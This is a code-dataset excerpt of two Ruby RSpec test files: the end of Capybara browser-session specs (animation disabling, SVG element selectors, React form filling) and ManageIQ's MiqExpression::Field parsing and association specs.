expect(@animation_session).to have_no_link('transition me away', wait: 0.5)
end
it 'should disable CSS animations (set to 0s)' do
@animation_session.visit('with_animation')
sleep 1
@animation_session.click_link('animate me away')
expect(@animation_session).to have_no_link('animate me away', wait: 0.5)
end
it 'should disable CSS animations on pseudo elements (set to 0s)' do
@animation_session.visit('with_animation')
sleep 1
@animation_session.find_link('animate me away').right_click
expect(@animation_session).to have_content('Animation Ended', wait: 0.1)
end
end
context 'if we pass in css that matches elements' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "safaridriver doesn't support multiple sessions" if safari?(session)
# NOTE: Although Capybara.SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = '#with_animation a'
@animation_session_with_matching_css = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should disable CSS transitions' do
@animation_session_with_matching_css.visit('with_animation')
sleep 1
@animation_session_with_matching_css.click_link('transition me away')
expect(@animation_session_with_matching_css).to have_no_link('transition me away', wait: 0.5)
end
it 'should disable CSS animations' do
@animation_session_with_matching_css.visit('with_animation')
sleep 1
@animation_session_with_matching_css.click_link('animate me away')
expect(@animation_session_with_matching_css).to have_no_link('animate me away', wait: 0.5)
end
end
context 'if we pass in css that does not match elements' do
before(:context) do # rubocop:disable RSpec/BeforeAfterAll
skip "Safari doesn't support multiple sessions" if safari?(session)
# NOTE: Although Capybara.SpecHelper.reset! sets Capybara.disable_animation to false,
# it doesn't affect any of these tests because the settings are applied per-session
Capybara.disable_animation = '.this-class-matches-nothing'
@animation_session_without_matching_css = Capybara::Session.new(session.mode, TestApp.new)
end
it 'should not disable CSS transitions' do
@animation_session_without_matching_css.visit('with_animation')
sleep 1
@animation_session_without_matching_css.click_link('transition me away')
sleep 0.5 # Wait long enough for click to have been processed
expect(@animation_session_without_matching_css).to have_link('transition me away', wait: false)
expect(@animation_session_without_matching_css).to have_no_link('transition me away', wait: 5)
end
it 'should not disable CSS animations' do
@animation_session_without_matching_css.visit('with_animation')
sleep 1
@animation_session_without_matching_css.click_link('animate me away')
sleep 0.5 # Wait long enough for click to have been processed
expect(@animation_session_without_matching_css).to have_link('animate me away', wait: false)
expect(@animation_session_without_matching_css).to have_no_link('animate me away', wait: 5)
end
end
end
# rubocop:enable RSpec/InstanceVariable
describe ':element selector' do
it 'can find html5 svg elements' do
session.visit('with_html5_svg')
expect(session).to have_selector(:element, :svg)
expect(session).to have_selector(:element, :rect, visible: :visible)
expect(session).to have_selector(:element, :circle)
expect(session).to have_selector(:element, :linearGradient, visible: :all)
end
it 'can query attributes with strange characters' do
session.visit('/form')
expect(session).to have_selector(:element, "{custom}": true)
expect(session).to have_selector(:element, "{custom}": 'abcdef')
end
end
describe 'with react' do
context 'controlled components' do
it 'can set and clear a text field' do
skip "This test doesn't support older browsers" if ie?(session)
session.visit 'react'
session.fill_in('Name:', with: 'abc')
session.accept_prompt 'A name was submitted: abc' do
session.click_button('Submit')
end
session.fill_in('Name:', with: '')
session.accept_prompt(/A name was submitted: $/) do
session.click_button('Submit')
end
end
it 'works with rapid fill' do
skip "This test doesn't support older browsers" if ie?(session)
session.visit 'react'
long_string = (0...60).map { |i| ((i % 26) + 65).chr }.join
session.fill_in('Name:', with: long_string)
session.accept_prompt "A name was submitted: #{long_string}" do
session.click_button('Submit')
end
end
end
end
end
def headless_or_remote?
!ENV['HEADLESS'].nil? || session.driver.options[:browser] == :remote
end
end
| 43.062 | 235 | 0.642794 |
e9e191851e89d0fd9b34c1f859dda796aa3a57f7 | 5,444 | require "rails_helper"
RSpec.describe MiqExpression::Field do
describe ".parse" do
it "can parse the model name" do
field = "Vm-name"
expect(described_class.parse(field).model).to be(Vm)
end
it "can parse a namespaced model name" do
field = "ManageIQ::Providers::CloudManager::Vm-name"
expect(described_class.parse(field).model).to be(ManageIQ::Providers::CloudManager::Vm)
end
it "can parse the model name with associations present" do
field = "Vm.host-name"
expect(described_class.parse(field).model).to be(Vm)
end
it "can parse the column name" do
field = "Vm-name"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse the column name with associations present" do
field = "Vm.host-name"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse the column name with pivot table suffix" do
field = "Vm-name__pv"
expect(described_class.parse(field).column).to eq("name")
end
it "can parse column names with snakecase" do
field = "Vm-last_scan_on"
expect(described_class.parse(field).column).to eq("last_scan_on")
end
it "can parse the associations when there is none present" do
field = "Vm-name"
expect(described_class.parse(field).associations).to be_empty
end
it "can parse the associations when there is one present" do
field = "Vm.host-name"
expect(described_class.parse(field).associations).to eq(["host"])
end
it "can parse the associations when there are many present" do
field = "Vm.host.hardware-id"
expect(described_class.parse(field).associations).to eq(%w(host hardware))
end
it "will raise a parse error when given a field with unsupported syntax" do
field = "Vm,host+name"
expect { described_class.parse(field) }.to raise_error(MiqExpression::Field::ParseError)
end
end
describe "#reflections" do
it "returns an empty array if there are no associations" do
field = described_class.new(Vm, [], "name")
expect(field.reflections).to be_empty
end
it "returns the reflections of fields with one association" do
field = described_class.new(Vm, ["host"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => Host)])
end
it "returns the reflections of fields with multiple associations" do
field = described_class.new(Vm, %w(host hardware), "guest_os")
expect(field.reflections).to match([an_object_having_attributes(:klass => Host),
an_object_having_attributes(:klass => Hardware)])
end
it "can handle associations which override the class name" do
field = described_class.new(Vm, ["users"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => Account)])
end
it "can handle virtual associations" do
field = described_class.new(Vm, ["processes"], "name")
expect(field.reflections).to match([an_object_having_attributes(:klass => OsProcess)])
end
it "raises an error if the field has invalid associations" do
field = described_class.new(Vm, %w(foo bar), "name")
expect { field.reflections }.to raise_error(/One or more associations are invalid: foo, bar/)
end
end
describe "#date?" do
it "returns true for fields of column type :date" do
field = described_class.new(Vm, [], "retires_on")
expect(field).to be_date
end
it "returns false for fields of column type other than :date" do
field = described_class.new(Vm, [], "name")
expect(field).not_to be_date
end
end
describe "#datetime?" do
it "returns true for fields of column type :datetime" do
field = described_class.new(Vm, [], "created_on")
expect(field).to be_datetime
end
it "returns false for fields of column type other than :datetime" do
field = described_class.new(Vm, [], "name")
expect(field).not_to be_datetime
end
it "returns true for a :datetime type column on an association" do
field = described_class.new(Vm, ["guest_applications"], "install_time")
expect(field).to be_datetime
end
end
describe "#target" do
it "returns the model when there are no associations" do
field = described_class.new(Vm, [], "name")
expect(field.target).to eq(Vm)
end
it "returns the model of the target association if there are associations" do
field = described_class.new(Vm, ["guest_applications"], "name")
expect(field.target).to eq(GuestApplication)
end
end
describe "#plural?" do
it "returns false if the column is on a 'belongs_to' association" do
field = described_class.new(Vm, ["storage"], "region_description")
expect(field).not_to be_plural
end
it "returns false if the column is on a 'has_one' association" do
field = described_class.new(Vm, ["hardware"], "guest_os")
expect(field).not_to be_plural
end
it "returns true if the column is on a 'has_many' association" do
field = described_class.new(Host, ["vms"], "name")
expect(field).to be_plural
end
it "returns true if the column is on a 'has_and_belongs_to_many' association" do
field = described_class.new(Vm, ["storages"], "name")
expect(field).to be_plural
end
end
end
| 34.675159 | 99 | 0.673218 |